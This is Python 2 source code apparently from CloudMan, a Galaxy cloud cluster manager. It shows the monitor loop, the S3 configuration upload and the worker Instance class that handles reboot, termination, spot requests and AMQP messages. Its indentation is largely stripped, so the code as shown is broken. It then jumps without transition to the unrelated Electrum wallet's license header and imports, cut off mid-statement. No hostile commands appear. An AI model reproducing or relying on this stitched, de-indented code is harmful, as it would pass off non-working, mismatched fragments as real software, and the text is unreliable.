log.debug("Storing cluster configuration to cluster's bucket")
s3_conn = self.app.cloud_interface.get_s3_connection()
if not s3_conn:
            # s3_conn will be None if use_object_store is False; in this case just skip this
# function.
return
if not misc.bucket_exists(s3_conn, self.app.ud['bucket_cluster']):
misc.create_bucket(s3_conn, self.app.ud['bucket_cluster'])
# Save/update the current Galaxy cluster configuration to cluster's
# bucket
cc_file_name = self.create_cluster_config_file()
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
'persistent_data.yaml', cc_file_name)
# Ensure Galaxy config files are stored in the cluster's bucket,
# but only after Galaxy has been configured and is running (this ensures
# that the configuration files get loaded from proper S3 bucket rather
# than potentially being overwritten by files that might exist on the
# snap)
try:
galaxy_svc = self.app.manager.get_services(
svc_role=ServiceRole.GALAXY)[0]
if galaxy_svc.running():
for f_name in ['universe_wsgi.ini',
'tool_conf.xml',
'tool_data_table_conf.xml',
'shed_tool_conf.xml',
'datatypes_conf.xml']:
if (os.path.exists(os.path.join(self.app.path_resolver.galaxy_home, f_name))) or \
(misc.file_in_bucket_older_than_local(s3_conn, self.app.ud['bucket_cluster'], '%s.cloud' % f_name, os.path.join(self.app.path_resolver.galaxy_home, f_name))):
log.debug(
"Saving current Galaxy configuration file '%s' to cluster bucket '%s' as '%s.cloud'" % (f_name,
self.app.ud['bucket_cluster'], f_name))
misc.save_file_to_bucket(
s3_conn, self.app.ud[
'bucket_cluster'], '%s.cloud' % f_name,
os.path.join(self.app.path_resolver.galaxy_home, f_name))
except:
pass
# If not existent, save current boot script cm_boot.py to cluster's bucket
# BUG: workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], self.app.ud['boot_script_name']) and
# os.path.exists(os.path.join(self.app.ud['boot_script_path'],
# self.app.ud['boot_script_name'])):
        log.debug("Saving current instance boot script (%s) to cluster bucket '%s' as '%s'"
                  % (os.path.join(self.app.ud['boot_script_path'], self.app.ud['boot_script_name']),
                     self.app.ud['bucket_cluster'], self.app.ud['boot_script_name']))
        misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'], self.app.ud['boot_script_name'],
                                 os.path.join(self.app.ud['boot_script_path'], self.app.ud['boot_script_name']))
# If not existent, save CloudMan source to cluster's bucket, including file's metadata
# BUG : workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], 'cm.tar.gz') and
# os.path.exists(os.path.join(self.app.ud['cloudman_home'],
# 'cm.tar.gz')):
log.debug("Saving CloudMan source (%s) to cluster bucket '%s' as '%s'" % (
os.path.join(self.app.ud['cloudman_home'], 'cm.tar.gz'), self.app.ud['bucket_cluster'], 'cm.tar.gz'))
misc.save_file_to_bucket(
s3_conn, self.app.ud['bucket_cluster'], 'cm.tar.gz',
os.path.join(self.app.ud['cloudman_home'], 'cm.tar.gz'))
try:
# Currently, metadata only works on ec2 so set it only there
if self.app.cloud_type == 'ec2':
with open(os.path.join(self.app.ud['cloudman_home'], 'cm_revision.txt'), 'r') as rev_file:
rev = rev_file.read()
misc.set_file_metadata(s3_conn, self.app.ud[
'bucket_cluster'], 'cm.tar.gz', 'revision', rev)
except Exception, e:
log.debug("Error setting revision metadata on newly copied cm.tar.gz in bucket %s: %s" % (self.app.ud[
'bucket_cluster'], e))
# Create an empty file whose name is the name of this cluster (useful
# as a reference)
cn_file = os.path.join(self.app.ud['cloudman_home'],
"%s.clusterName" % self.app.ud['cluster_name'])
# BUG : workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], "%s.clusterName" %
# self.app.ud['cluster_name']):
with open(cn_file, 'w'):
pass
if os.path.exists(cn_file):
log.debug("Saving '%s' file to cluster bucket '%s' as '%s.clusterName'" % (
cn_file, self.app.ud['bucket_cluster'], self.app.ud['cluster_name']))
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
"%s.clusterName" % self.app.ud['cluster_name'], cn_file)
def __add_services(self):
# Check and add any new services
added_srvcs = False # Flag to indicate if cluster conf was changed
for service in [s for s in self.app.manager.services if s.state == service_states.UNSTARTED]:
log.debug("Monitor adding service '%s'" % service.get_full_name())
self.last_system_change_time = Time.now()
if service.add():
                added_srvcs = True
            # else:
            #     log.debug("Monitor DIDN'T add service {0}? Service state: {1}"
            #               .format(service.get_full_name(), service.state))
# Store cluster conf after all services have been added.
# NOTE: this flag relies on the assumption service additions are
# sequential (i.e., monitor waits for the service add call to complete).
# If any of the services are to be added via separate threads, a
# system-wide flag should probably be maintained for that particular
# service that would indicate the configuration of the service is
# complete. This could probably be done by monitoring
# the service state flag that is already maintained?
        if added_srvcs and self.app.cloud_type != 'opennebula':
            self.store_cluster_config()
        # Check and grow the file system
        svcs = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles and svc.grow is not None:
self.last_system_change_time = Time.now()
self.expand_user_data_volume()
# Opennebula has no storage like S3, so this is not working (yet)
if self.app.cloud_type != 'opennebula':
self.store_cluster_config()
def __check_amqp_messages(self):
# Check for any new AMQP messages
m = self.conn.recv()
while m is not None:
def do_match():
match = False
for inst in self.app.manager.worker_instances:
if str(inst.id) == str(m.properties['reply_to']):
match = True
inst.handle_message(m.body)
return match
if not do_match():
log.debug("No instance (%s) match found for message %s; will add instance now!"
% (m.properties['reply_to'], m.body))
if self.app.manager.add_live_instance(m.properties['reply_to']):
do_match()
else:
log.warning("Potential error, got message from instance '%s' "
"but not aware of this instance. Ignoring the instance."
% m.properties['reply_to'])
m = self.conn.recv()
def __monitor(self):
if not self.app.manager.manager_started:
if not self.app.manager.start():
log.critical("\n\n***** Manager failed to start *****\n")
return False
log.debug("Monitor started; manager started")
while self.running:
self.sleeper.sleep(4)
if self.app.manager.cluster_status == cluster_status.TERMINATED:
self.running = False
return
# In case queue connection was not established, try again (this will happen if
# RabbitMQ does not start in time for CloudMan)
if not self.conn.is_connected():
log.debug(
"Trying to setup AMQP connection; conn = '%s'" % self.conn)
self.conn.setup()
continue
# Do a periodic system state update (eg, services, workers)
self._update_frequency()
if (Time.now() - self.last_update_time).seconds > self.update_frequency:
self.last_update_time = Time.now()
self.app.manager.check_disk()
for service in self.app.manager.services:
service.status()
# Indicate migration is in progress
migration_service = self.app.manager.get_services(svc_role=ServiceRole.MIGRATION)
if migration_service:
migration_service = migration_service[0]
msg = "Migration service in progress; please wait."
if migration_service.state == service_states.RUNNING:
if not self.app.msgs.message_exists(msg):
self.app.msgs.critical(msg)
elif migration_service.state == service_states.COMPLETED:
self.app.msgs.remove_message(msg)
# Log current services' states (in condensed format)
svcs_state = "S&S: "
for s in self.app.manager.services:
svcs_state += "%s..%s; " % (s.get_full_name(),
'OK' if s.state == 'Running' else s.state)
log.debug(svcs_state)
# Check the status of worker instances
for w_instance in self.app.manager.worker_instances:
if w_instance.is_spot():
w_instance.update_spot()
if not w_instance.spot_was_filled():
# Wait until the Spot request has been filled to start
# treating the instance as a regular Instance
continue
# Send current mount points to ensure master and workers FSs are in sync
if w_instance.node_ready:
w_instance.send_mount_points()
                    # As long as we're hearing from an instance, assume all is OK.
if (Time.now() - w_instance.last_comm).seconds < 22:
# log.debug("Instance {0} OK (heard from it {1} secs ago)".format(
# w_instance.get_desc(),
# (Time.now() - w_instance.last_comm).seconds))
continue
# Explicitly check the state of a quiet instance (but only
# periodically)
elif (Time.now() - w_instance.last_state_update).seconds > 30:
log.debug("Have not heard from or checked on instance {0} "
"for a while; checking now.".format(w_instance.get_desc()))
w_instance.maintain()
else:
log.debug("Instance {0} has been quiet for a while (last check "
"{1} secs ago); will wait a bit longer before a check..."
.format(w_instance.get_desc(),
(Time.now() - w_instance.last_state_update).seconds))
self.__add_services()
self.__check_amqp_messages()
class Instance(object):
def __init__(self, app, inst=None, m_state=None, last_m_state_change=None,
sw_state=None, reboot_required=False, spot_request_id=None):
self.app = app
self.config = app.config
self.spot_request_id = spot_request_id
self.lifecycle = instance_lifecycle.SPOT if self.spot_request_id else instance_lifecycle.ONDEMAND
self.inst = inst # boto object of the instance
self.spot_state = None
self.private_ip = None
self.public_ip = None
self.local_hostname = None
if inst:
try:
self.id = str(inst.id)
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
else:
self.id = None
# Machine state as obtained from the cloud middleware (see
# instance_states Bunch)
self.m_state = m_state
self.last_m_state_change = Time.now()
# A time stamp when the most recent update of the instance state
# (m_state) took place
self.last_state_update = Time.now()
self.sw_state = sw_state # Software state
self.is_alive = False
self.node_ready = False
self.num_cpus = 1
self.time_rebooted = TIME_IN_PAST # Initialize to a date in the past
self.reboot_count = 0
self.terminate_attempt_count = 0
self.last_comm = TIME_IN_PAST # Initialize to a date in the past
self.nfs_data = 0
self.nfs_tools = 0
self.nfs_indices = 0
self.nfs_sge = 0
self.nfs_tfs = 0 # Transient file system, NFS-mounted from the master
self.get_cert = 0
self.sge_started = 0
self.worker_status = 'Pending' # Pending, Wake, Startup, Ready, Stopping, Error
self.load = 0
self.type = 'Unknown'
self.reboot_required = reboot_required
self.update_spot()
def maintain(self):
""" Based on the state and status of this instance, try to do the right thing
to keep the instance functional. Note that this may lead to terminating
the instance.
"""
def reboot_terminate_logic():
""" Make a decision whether to terminate or reboot an instance.
CALL THIS METHOD CAREFULLY because it defaults to terminating the
instance!
"""
if self.reboot_count < self.config.instance_reboot_attempts:
self.reboot()
elif self.terminate_attempt_count >= self.config.instance_terminate_attempts:
log.info("Tried terminating instance {0} {1} times but was unsuccessful. Giving up."
.format(self.inst.id, self.config.instance_terminate_attempts))
self._remove_instance()
else:
log.info("Instance {0} not responding after {1} reboots. Terminating instance."
.format(self.id, self.reboot_count))
self.terminate()
# Update state then do resolution
state = self.get_m_state()
if state == instance_states.PENDING or state == instance_states.SHUTTING_DOWN:
if (Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
log.debug("'Maintaining' instance {0} stuck in '{1}' state.".format(
self.get_desc(), state))
reboot_terminate_logic()
elif state == instance_states.ERROR:
log.debug(
"'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(),
instance_states.ERROR))
reboot_terminate_logic()
elif state == instance_states.TERMINATED:
log.debug(
"'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(),
instance_states.TERMINATED))
self._remove_instance()
elif state == instance_states.RUNNING:
log.debug("'Maintaining' instance {0} in '{1}' state (last comm before {2} | "
"last m_state change before {3} | time_rebooted before {4}".format(
self.get_desc(), instance_states.RUNNING,
dt.timedelta(seconds=(Time.now() - self.last_comm).seconds),
dt.timedelta(seconds=(Time.now() - self.last_m_state_change).seconds),
dt.timedelta(seconds=(Time.now() - self.time_rebooted).seconds)))
if (Time.now() - self.last_comm).seconds > self.config.instance_comm_timeout and \
(Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
reboot_terminate_logic()
def get_cloud_instance_object(self, deep=False):
""" Get the instance object for this instance from the library used to
communicate with the cloud middleware. In the case of boto, this
is the boto EC2 Instance object.
:type deep: bool
:param deep: If True, force the check with the cloud middleware; else
use local field by default
:rtype: boto.ec2.instance.Instance (should really be a more generic repr
but we'll wait for OCCI or something)
:return: cloud instance object for this instance
"""
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance cloud object, but TESTFLAG is set. Returning None")
return None
if deep is True: # reset the current local instance field
self.inst = None
if self.inst is None and self.id is not None:
try:
rs = self.app.cloud_interface.get_all_instances(self.id)
if len(rs) == 0:
log.warning("Instance {0} not found on the cloud?".format(
self.id))
for r in rs:
# Update local fields
self.inst = r.instances[0]
self.id = r.instances[0].id
self.m_state = r.instances[0].state
except EC2ResponseError, e:
log.error("Trouble getting the cloud instance ({0}) object: {1}"
.format(self.id, e))
except Exception, e:
log.error("Error getting the cloud instance ({0}) object: {1}"
.format(self.id, e))
elif not self.is_spot():
log.debug(
"Cannot get cloud instance object without an instance ID?")
return self.inst
def is_spot(self):
""" Test is this Instance is a Spot instance.
:rtype: bool
:return: True if the current Instance is Spot instance, False otherwise.
"""
return self.lifecycle == instance_lifecycle.SPOT
def spot_was_filled(self):
""" For Spot-based instances, test if the spot request has been
filled (ie, an instance was started)
:rtype: bool
:return: True if this is a Spot instance and the Spot request
is in state spot_states.ACTIVE. False otherwise.
"""
self.update_spot()
if self.is_spot() and self.spot_state == spot_states.ACTIVE:
return True
return False
def get_status_dict(self):
toret = {'id': self.id,
'ld': self.load,
'time_in_state': misc.formatSeconds(Time.now() - self.last_m_state_change),
'nfs_data': self.nfs_data,
'nfs_tools': self.nfs_tools,
'nfs_indices': self.nfs_indices,
'nfs_sge': self.nfs_sge,
'nfs_tfs': self.nfs_tfs,
'get_cert': self.get_cert,
'sge_started': self.sge_started,
'worker_status': self.worker_status,
'instance_state': self.m_state,
'instance_type': self.type,
'public_ip': self.public_ip}
if self.load != 0:
lds = self.load.split(' ')
if len(lds) == 3:
toret['ld'] = "%s %s %s" % (float(lds[0]) / self.num_cpus, float(
lds[1]) / self.num_cpus, float(lds[2]) / self.num_cpus)
return toret
def get_status_array(self):
        if self.m_state.lower() == "running":  # For extra states.
            ld = self.load  # Fallback so 'ld' is always defined below
            if self.is_alive is not True:
                ld = "Starting"
elif self.load != 0:
lds = self.load.split(' ')
if len(lds) == 3:
try:
load1 = float(lds[0]) / self.num_cpus
load2 = float(lds[1]) / self.num_cpus
load3 = float(lds[2]) / self.num_cpus
ld = "%s %s %s" % (load1, load2, load3)
except Exception, e:
log.debug("Problems normalizing load: %s" % e)
ld = self.load
else:
ld = self.load
elif self.node_ready:
ld = "Running"
return [self.id, ld, misc.formatSeconds(
Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
else:
return [self.id, self.m_state, misc.formatSeconds(Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
def get_id(self):
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance id, but TESTFLAG is set. Returning TestInstanceID")
return "TestInstanceID"
if self.inst is not None and self.id is None:
try:
self.inst.update()
self.id = self.inst.id
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
except Exception, e:
                log.error("Exception retrieving instance object: %s" % e)
return self.id
def get_desc(self):
""" Get basic but descriptive info about this instance. Useful for logging.
"""
if self.is_spot() and not self.spot_was_filled():
return "'{sid}'".format(sid=self.spot_request_id)
return "'{id}' (IP: {ip})".format(id=self.get_id(), ip=self.get_public_ip())
def reboot(self, count_reboot=True):
"""
Reboot this instance. If ``count_reboot`` is set, increment the number
        of reboots for this instance (a threshold in this count leads to eventual
instance termination, see ``self.config.instance_reboot_attempts``).
"""
if self.inst is not None:
# Show reboot count only if this reboot counts toward the reboot quota
s = " (reboot #{0})".format(self.reboot_count + 1)
log.info("Rebooting instance {0}{1}.".format(self.get_desc(),
s if count_reboot else ''))
try:
self.inst.reboot()
self.time_rebooted = Time.now()
except EC2ResponseError, e:
log.error("Trouble rebooting instance {0}: {1}".format(self.get_desc(), e))
else:
            log.debug("Attempted to reboot instance {0} but no instance object? "
"(doing nothing)".format(self.get_desc()))
if count_reboot:
            # Increment irrespective of success to allow for eventual termination
self.reboot_count += 1
log.debug("Incremented instance reboot count to {0} (out of {1})"
.format(self.reboot_count, self.config.instance_reboot_attempts))
def terminate(self):
self.worker_status = "Stopping"
t_thread = threading.Thread(target=self.__terminate)
t_thread.start()
return t_thread
def __terminate(self):
inst_terminated = self.app.cloud_interface.terminate_instance(
instance_id=self.id,
spot_request_id=self.spot_request_id if self.is_spot() else None)
self.terminate_attempt_count += 1
if inst_terminated is False:
log.error("Terminating instance %s did not go smoothly; instance state: '%s'"
% (self.get_desc(), self.get_m_state()))
else:
# Remove the reference to the instance object because with OpenStack &
# boto the instance.update() method returns the instance as being
# in 'running' state even though the instance does not even exist
# any more.
self.inst = None
self._remove_instance()
def _remove_instance(self, force=False):
""" A convenience method to remove the current instance from the list
of worker instances tracked by the master object.
:type force: bool
:param force: Indicate if the instance should be forcefully (ie, irrespective)
of other logic) removed from the list of instances maintained
by the master object.
"""
try:
if self in self.app.manager.worker_instances:
self.app.manager.worker_instances.remove(self)
log.info(
"Instance '%s' removed from the internal instance list." % self.id)
# If this was the last worker removed, add master back as execution host.
if len(self.app.manager.worker_instances) == 0 and not self.app.manager.master_exec_host:
self.app.manager.toggle_master_as_exec_host()
except ValueError, e:
log.warning("Instance '%s' no longer in instance list, the global monitor probably "
"picked it up and deleted it already: %s" % (self.id, e))
def instance_can_be_terminated(self):
log.debug("Checking if instance '%s' can be terminated" % self.id)
# TODO (qstat -qs {a|c|d|o|s|u|A|C|D|E|S})
return False
def get_m_state(self):
""" Update the machine state of the current instance by querying the
cloud middleware for the instance object itself (via the instance
id) and updating self.m_state field to match the state returned by
the cloud middleware.
Also, update local last_state_update timestamp.
:rtype: String
:return: the current state of the instance as obtained from the
cloud middleware
"""
if self.app.TESTFLAG is True:
log.debug("Getting m_state for instance {0} but TESTFLAG is set; returning 'running'"
.format(self.get_id()))
return "running"
self.last_state_update = Time.now()
self.get_cloud_instance_object(deep=True)
if self.inst:
try:
state = self.inst.state
log.debug("Requested instance {0} update: old state: {1}; new state: {2}"
.format(self.get_desc(), self.m_state, state))
if state != self.m_state:
self.m_state = state
self.last_m_state_change = Time.now()
except EC2ResponseError, e:
log.debug("Error updating instance {0} state: {1}".format(
self.get_id(), e))
self.m_state = instance_states.ERROR
else:
if not self.is_spot() or self.spot_was_filled():
log.debug("Instance object {0} not found during m_state update; "
"setting instance state to {1}".format(self.get_id(), instance_states.TERMINATED))
self.m_state = instance_states.TERMINATED
return self.m_state
@TestFlag(None)
def send_alive_request(self):
self.app.manager.console_monitor.conn.send('ALIVE_REQUEST', self.id)
def send_sync_etc_host(self, msg):
# Because the hosts file is synced over the transientFS, give the FS
# some time to become available before sending the msg
for i in range(5):
if int(self.nfs_tfs):
self.app.manager.console_monitor.conn.send('SYNC_ETC_HOSTS | ' + msg, self.id)
break
log.debug("Transient FS on instance not available; waiting a bit...")
time.sleep(7)
def send_status_check(self):
# log.debug("\tMT: Sending STATUS_CHECK message" )
if self.app.TESTFLAG is True:
return
self.app.manager.console_monitor.conn.send('STATUS_CHECK', self.id)
# log.debug( "\tMT: Message STATUS_CHECK sent; waiting on response" )
def send_worker_restart(self):
# log.info("\tMT: Sending restart message to worker %s" % self.id)
if self.app.TESTFLAG is True:
return
self.app.manager.console_monitor.conn.send('RESTART | %s' % self.app.cloud_interface.get_private_ip(), self.id)
log.info("\tMT: Sent RESTART message to worker '%s'" % self.id)
def update_spot(self, force=False):
""" Get an update on the state of a Spot request. If the request has entered
spot_states.ACTIVE or spot_states.CANCELLED states, update the Instance
object itself otherwise just update state. The method will continue to poll
for an update until the spot request has been filled (ie, enters state
spot_states.ACTIVE). After that, simply return the spot state (see
force parameter).
:type force: bool
:param force: If True, poll for an update on the spot request,
irrespective of the stored spot request state.
"""
if self.is_spot() and (force or self.spot_state != spot_states.ACTIVE):
old_state = self.spot_state
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
reqs = ec2_conn.get_all_spot_instance_requests(
request_ids=[self.spot_request_id])
for req in reqs:
self.spot_state = req.state
# Also update the worker_status because otherwise there's no
# single source to distinguish between simply an instance
# in Pending state and a Spot request
self.worker_status = self.spot_state
# If the state has changed, do a deeper update
if self.spot_state != old_state:
if self.spot_state == spot_states.CANCELLED:
# The request was canceled so remove this Instance
# object
log.info("Spot request {0} was canceled; removing Instance object {1}"
.format(self.spot_request_id, self.id))
self._remove_instance()
elif self.spot_state == spot_states.ACTIVE:
# We should have an instance now
self.id = req.instance_id
log.info("Spot request {0} filled with instance {1}"
.format(self.spot_request_id, self.id))
# Potentially give it a few seconds so everything gets registered
for i in range(3):
instance = self.get_cloud_instance_object()
if instance:
self.app.cloud_interface.add_tag(instance,
'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance,
'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
break
time.sleep(5)
except EC2ResponseError, e:
log.error("Trouble retrieving spot request {0}: {1}".format(
self.spot_request_id, e))
return self.spot_state
def get_private_ip(self):
# log.debug("Getting instance '%s' private IP: '%s'" % ( self.id, self.private_ip ) )
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance private IP, but TESTFLAG is set. Returning 127.0.0.1")
self.private_ip = '127.0.0.1'
if self.private_ip is None:
inst = self.get_cloud_instance_object()
if inst is not None:
try:
inst.update()
self.private_ip = inst.private_ip_address
except EC2ResponseError:
log.debug("private_ip_address for instance {0} not (yet?) available."
.format(self.get_id()))
else:
log.debug("private_ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.private_ip
@TestFlag('127.0.0.1')
def get_public_ip(self):
"""
Get the public IP address of this worker instance.
"""
if not self.public_ip:
inst = self.get_cloud_instance_object(deep=True)
# log.debug('Getting public IP for instance {0}'.format(inst.id))
if inst:
try:
inst.update()
self.public_ip = inst.ip_address
if self.public_ip:
log.debug("Got public IP for instance {0}: {1}".format(
self.get_id(), self.public_ip))
else:
log.debug("Still no public IP for instance {0}".format(
self.get_id()))
except EC2ResponseError:
log.debug("ip_address for instance {0} not (yet?) available.".format(
self.get_id()))
else:
log.debug("ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.public_ip
def get_local_hostname(self):
return self.local_hostname
def send_mount_points(self):
mount_points = []
for fs in self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM):
if fs.nfs_fs:
fs_type = "nfs"
server = fs.nfs_fs.device
options = fs.nfs_fs.mount_options
elif fs.gluster_fs:
fs_type = "glusterfs"
server = fs.gluster_fs.device
options = fs.gluster_fs.mount_options
else:
fs_type = "nfs"
server = self.app.cloud_interface.get_private_ip()
options = None
mount_points.append(
{'fs_type': fs_type,
'server': server,
'mount_options': options,
'shared_mount_path': fs.get_details()['mount_point'],
'fs_name': fs.get_details()['name']})
jmp = json.dumps({'mount_points': mount_points})
self.app.manager.console_monitor.conn.send('MOUNT | %s' % jmp, self.id)
# log.debug("Sent mount points %s to worker %s" % (mount_points, self.id))
def send_master_pubkey(self):
# log.info("\tMT: Sending MASTER_PUBKEY message: %s" % self.app.manager.get_root_public_key() )
self.app.manager.console_monitor.conn.send('MASTER_PUBKEY | %s'
% self.app.manager.get_root_public_key(), self.id)
log.debug("Sent master public key to worker instance '%s'." % self.id)
log.debug("\tMT: Message MASTER_PUBKEY %s sent to '%s'"
% (self.app.manager.get_root_public_key(), self.id))
def send_start_sge(self):
log.debug("\tMT: Sending START_SGE message to instance '%s'" % self.id)
self.app.manager.console_monitor.conn.send('START_SGE', self.id)
def send_add_s3fs(self, bucket_name, svc_roles):
msg = 'ADDS3FS | {0} | {1}'.format(bucket_name, ServiceRole.to_string(svc_roles))
self._send_msg(msg)
# def send_add_nfs_fs(self, nfs_server, fs_name, svc_roles, username=None, pwd=None):
# """
# Send a message to the worker node requesting it to mount a new file system
    # from the ``nfs_server`` at mount point /mnt/``fs_name`` with roles ``svc_roles``.
# """
# nfs_server_info = {
# 'nfs_server': nfs_server, 'fs_name': fs_name, 'username': username,
# 'pwd': pwd, 'svc_roles': ServiceRole.to_string(svc_roles)
# }
# msg = "ADD_NFS_FS | {0}".format(json.dumps({'nfs_server_info': nfs_server_info}))
# self._send_msg(msg)
def _send_msg(self, msg):
"""
An internal convenience method to log and send a message to the current instance.
"""
log.debug("\tMT: Sending message '{msg}' to instance {inst}".format(msg=msg, inst=self.id))
self.app.manager.console_monitor.conn.send(msg, self.id)
def handle_message(self, msg):
# log.debug( "Handling message: %s from %s" % ( msg, self.id ) )
self.is_alive = True
self.last_comm = Time.now()
# Transition from states to a particular response.
if self.app.manager.console_monitor.conn:
msg_type = msg.split(' | ')[0]
if msg_type == "ALIVE":
self.worker_status = "Starting"
log.info("Instance %s reported alive" % self.get_desc())
msp = msg.split(' | ')
self.private_ip = msp[1]
self.public_ip = msp[2]
self.zone = msp[3]
self.type = msp[4]
self.ami = msp[5]
try:
self.local_hostname = msp[6]
except:
# Older versions of CloudMan did not pass this value so if the master
# and the worker are running 2 diff versions (can happen after an
# automatic update), don't crash here.
self.local_hostname = self.public_ip
                log.debug("INSTANCE_ALIVE private_ip:%s public_ip:%s zone:%s type:%s ami:%s hostname: %s"
% (self.private_ip,
self.public_ip,
self.zone,
self.type,
self.ami,
self.local_hostname))
# Instance is alive and functional. Send master pubkey.
self.send_mount_points()
elif msg_type == "GET_MOUNTPOINTS":
self.send_mount_points()
elif msg_type == "MOUNT_DONE":
self.send_master_pubkey()
# Add hostname to /etc/hosts (for SGE config)
if self.app.cloud_type in ('openstack', 'eucalyptus'):
hn2 = ''
if '.' in self.local_hostname:
hn2 = (self.local_hostname).split('.')[0]
worker_host_line = '{ip} {hn1} {hn2}\n'.format(ip=self.private_ip,
hn1=self.local_hostname, hn2=hn2)
log.debug("worker_host_line: {0}".format(worker_host_line))
with open('/etc/hosts', 'r+') as f:
hosts = f.readlines()
if worker_host_line not in hosts:
log.debug("Adding worker {0} to /etc/hosts".format(
self.local_hostname))
f.write(worker_host_line)
if self.app.cloud_type == 'opennebula':
f = open("/etc/hosts", 'a')
f.write("%s\tworker-%s\n" % (self.private_ip, self.id))
f.close()
elif msg_type == "WORKER_H_CERT":
self.is_alive = True # This is for the case that an existing worker is added to a new master.
self.app.manager.save_host_cert(msg.split(" | ")[1])
log.debug("Worker '%s' host certificate received and appended to /root/.ssh/known_hosts"
% self.id)
try:
sge_svc = self.app.manager.get_services(
svc_role=ServiceRole.SGE)[0]
if sge_svc.add_sge_host(self.get_id(), self.local_hostname):
# Send a message to worker to start SGE
self.send_start_sge()
# If there are any bucket-based FSs, tell the worker to
# add those
fss = self.app.manager.get_services(
svc_type=ServiceType.FILE_SYSTEM)
for fs in fss:
if len(fs.buckets) > 0:
for b in fs.buckets:
self.send_add_s3fs(b.bucket_name, fs.svc_roles)
log.info("Waiting on worker instance %s to configure itself..."
% self.get_desc())
else:
log.error("Adding host to SGE did not go smoothly, "
"not instructing worker to configure SGE daemon.")
except IndexError:
log.error(
"Could not get a handle on SGE service to add a host; host not added")
elif msg_type == "NODE_READY":
self.node_ready = True
self.worker_status = "Ready"
log.info("Instance %s ready" % self.get_desc())
msplit = msg.split(' | ')
try:
self.num_cpus = int(msplit[2])
                except (IndexError, ValueError):
log.debug(
"Instance '%s' num CPUs is not int? '%s'" % (self.id, msplit[2]))
log.debug("Instance '%s' reported as having '%s' CPUs." %
(self.id, self.num_cpus))
                # Make sure the instance is tagged (this is also necessary to do
# here for OpenStack because it does not allow tags to be added
# until an instance is 'running')
self.app.cloud_interface.add_tag(self.inst, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(self.inst, 'role', 'worker')
self.app.cloud_interface.add_tag(self.inst, 'Name', "Worker: {0}"
.format(self.app.ud['cluster_name']))
log.debug("update condor host through master")
self.app.manager.update_condor_host(self.public_ip)
log.debug("update etc host through master")
self.app.manager.update_etc_host()
elif msg_type == "NODE_STATUS":
msplit = msg.split(' | ')
self.nfs_data = msplit[1]
self.nfs_tools = msplit[2] # Workers currently do not update this field
self.nfs_indices = msplit[3]
self.nfs_sge = msplit[4]
self.get_cert = msplit[5]
self.sge_started = msplit[6]
self.load = msplit[7]
self.worker_status = msplit[8]
self.nfs_tfs = msplit[9]
elif msg_type == 'NODE_SHUTTING_DOWN':
msplit = msg.split(' | ')
self.worker_status = msplit[1]
else: # Catch-all condition
log.debug("Unknown Message: %s" % msg)
else:
log.error("Epic Failure, squeue not available?")
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
